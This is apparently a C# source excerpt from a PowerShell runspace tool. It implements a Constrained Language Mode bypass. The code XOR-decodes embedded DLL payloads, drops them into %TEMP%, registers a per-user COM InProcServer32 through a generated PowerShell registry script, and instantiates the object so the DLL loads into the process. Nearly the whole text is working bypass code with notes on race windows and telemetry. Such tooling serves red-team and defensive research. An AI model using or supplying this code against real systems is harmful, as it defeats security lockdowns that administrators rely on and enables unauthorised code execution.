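/// <summary>
/// Performs the CLM bypass in three steps: decode the two embedded payloads and write them to
/// %TEMP%, register a per-user COM server whose InProcServer32 is the dropped DLL, then
/// instantiate that COM object from the runspace so COM loads the DLL into this process.
/// </summary>
/// <param name="rs">PowerShell instance the registration and <c>New-Object</c> commands run in.</param>
/// <param name="host">Host object passed through to <c>Stracciatella.ExecuteCommand</c>.</param>
/// <returns>
/// <c>false</c> when <see cref="CreateCOM"/> reports failure; <c>true</c> otherwise. The result of
/// the <c>New-Object</c> call is not inspected, so <c>true</c> only means "registration looked OK
/// and the instantiation was attempted", not that the DLL actually loaded.
/// </returns>
/// <remarks>
/// Caveats visible from this code alone:
/// <list type="bullet">
/// <item>Both files are written to the user-writable %TEMP% directory and the registration done by
/// <see cref="CreateCOM"/> hard-codes <c>$Env:Temp\ClmDisableDll.dll</c> as the server path.
/// <c>OUTPUT_CLMDISABLEDLL_PATH</c> must resolve to that same file, and anything else with write
/// access to %TEMP% can replace the DLL between the write here and the <c>New-Object</c> load.</item>
/// <item>This method never calls <c>CreateCOM(rs, host, deregister: true)</c> and never deletes the
/// dropped files, so the per-user CLSID/ProgID keys and both files persist unless the caller
/// cleans them up.</item>
/// </list>
/// </remarks>
public static bool ProperDisable(PowerShell rs, CustomPSHost host)
{
    // Progress output is only emitted in verbose mode.
    void Trace(string line)
    {
        if (DisableClm.Verbose)
        {
            Console.WriteLine(line);
        }
    }

    // XOR-decode an embedded blob and overwrite the target file with it.
    void DropDecodedFile(string templatePath, byte[] encoded)
    {
        string target = Environment.ExpandEnvironmentVariables(templatePath);
        byte[] plain = Decoder.XorDecodeBinary(encoded, ClmEmbeddedFiles.FilesXorKey);
        File.WriteAllBytes(target, plain);
    }

    Trace("[.] Step 0. Plant DLL files in: %TEMP%");
    DropDecodedFile(OUTPUT_CLMDISABLEASSEMBLY_PATH, ClmEmbeddedFiles.ClmDisableAssemblyData);
    DropDecodedFile(OUTPUT_CLMDISABLEDLL_PATH, ClmEmbeddedFiles.ClmDisableDllData);

    Trace("[.] Step 1. Creating custom COM object.");
    if (!CreateCOM(rs, host))
    {
        Trace("[-] Could not register custom COM object. CLM bypass failed.");
        return false;
    }

    Trace("[.] Step 2. Invoking it...");

    // The instantiation is what makes COM load the DLL, so it must run regardless of the
    // verbosity setting. It was previously wrapped in `if (DisableClm.Verbose)`, which turned
    // the non-verbose path into a no-op that still returned true.
    Stracciatella.ExecuteCommand($"New-Object -ComObject {COM_NAME}", rs, host, true, true, false);

    // Fixed grace period for the in-proc server before control returns to the caller.
    System.Threading.Thread.Sleep(1000);
    return true;
}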
/// <summary>
/// Registers — or, when <paramref name="deregister"/> is set, removes — the per-user COM server
/// used by the CLM bypass. The registry work is done by a PowerShell script executed through
/// <c>Stracciatella.ExecuteCommand</c> rather than via the .NET registry API.
/// </summary>
/// <param name="rs">PowerShell instance the script runs in.</param>
/// <param name="host">Host object passed through to <c>Stracciatella.ExecuteCommand</c>.</param>
/// <param name="deregister">
/// <c>false</c> (default): create <c>HKU\&lt;sid&gt;_classes\CLSID\&lt;COM_GUID&gt;\InProcServer32</c>
/// pointing at <c>$Env:Temp\ClmDisableDll.dll</c> (ThreadingModel Apartment) and the
/// <c>HKU\&lt;sid&gt;_classes\&lt;COM_NAME&gt;\CLSID</c> ProgID mapping to that GUID.
/// <c>true</c>: recursively delete both key trees.
/// </param>
/// <returns>
/// <c>true</c> when the script produced any output. This is only a proxy for success: the register
/// script lets New-Item/New-ItemProperty objects flow to the output, whereas the deregister script
/// pipes everything to out-null, so whether either case yields output — and whether error text
/// counts — depends on what <c>ExecuteCommand</c> returns, which is not visible here.
/// </returns>
/// <remarks>
/// The script resolves the caller's SID by spawning <c>whoami /user</c> and writes under the user's
/// own Classes hive, so no elevation is required; both the child process and the registry writes
/// are observable by endpoint telemetry. The DLL path is hard-coded and must match the file the
/// caller drops (presumably <c>OUTPUT_CLMDISABLEDLL_PATH</c> — verify).
/// </remarks>
private static bool CreateCOM(PowerShell rs, CustomPSHost host, bool deregister = false)
{
    // Expanded by PowerShell (it sits inside a double-quoted PS literal), not by C#.
    const string serverDllPath = @"$($Env:Temp)\ClmDisableDll.dll";

    // Values spliced into the script as PowerShell double-quoted literals.
    string guidLiteral = "\"" + COM_GUID + "\"";
    string progIdLiteral = "\"" + COM_NAME + "\"";
    string descriptionLiteral = "\"" + COM_DESCRIPTION + "\"";
    string dllLiteral = "\"" + serverDllPath + "\"";

    // Common prologue: pull the current user's SID out of `whoami /user`.
    const string resolveSid =
        @"$sid = (whoami /user | select-string -Pattern ""(S-1-5[0-9-]+)"" -all | select -ExpandProperty Matches).value;";

    string[] registerLines =
    {
        resolveSid,
        "New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS;",
        // This first $key assignment is immediately overwritten; kept to match the original script.
        @"$key = 'HKU:\{0}_classes' -f $sid;",
        @"$key = 'HKU:\{0}_classes\CLSID\' -f $sid;",
        "New-Item -Force -Path $key -Name " + guidLiteral + ";",
        @"$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, " + guidLiteral + ";",
        "New-Item -Force -Path $key -Name 'InProcServer32';",
        "New-ItemProperty -Force -Path $key -Name '(Default)' -Value " + descriptionLiteral + " -PropertyType String;",
        @"$key = 'HKU:\{0}_classes\CLSID\{1}\InProcServer32' -f $sid, " + guidLiteral + ";",
        "New-ItemProperty -Force -Path $key -Name '(Default)' -Value " + dllLiteral + " -PropertyType String;",
        "New-ItemProperty -Force -Path $key -Name 'ThreadingModel' -Value \"Apartment\" -PropertyType String;",
        @"$key = 'HKU:\{0}_classes' -f $sid;",
        "New-Item -Force -Path $key -Name " + progIdLiteral + ";",
        @"$key = 'HKU:\{0}_classes\{1}' -f $sid, " + progIdLiteral + ";",
        "New-ItemProperty -Force -Path $key -Name '(Default)' -Value " + descriptionLiteral + " -PropertyType String;",
        "New-Item -Force -Path $key -Name 'CLSID';",
        @"$key = 'HKU:\{0}_classes\{1}\CLSID' -f $sid, " + progIdLiteral + ";",
        "New-ItemProperty -Force -Path $key -Name '(Default)' -Value " + guidLiteral + " -PropertyType String;",
    };

    string[] deregisterLines =
    {
        resolveSid,
        "New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS | out-null",
        @"$key = 'HKU:\{0}_classes\{1}' -f $sid, " + progIdLiteral + ";",
        "Remove-Item -Force -Path $key -Recurse | out-null",
        @"$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, " + guidLiteral + ";",
        "Remove-Item -Force -Path $key -Recurse | out-null",
    };

    string script = string.Join(Environment.NewLine, deregister ? deregisterLines : registerLines);
    string output = Stracciatella.ExecuteCommand(script, rs, host, true, true);
    return output.Length > 0;
}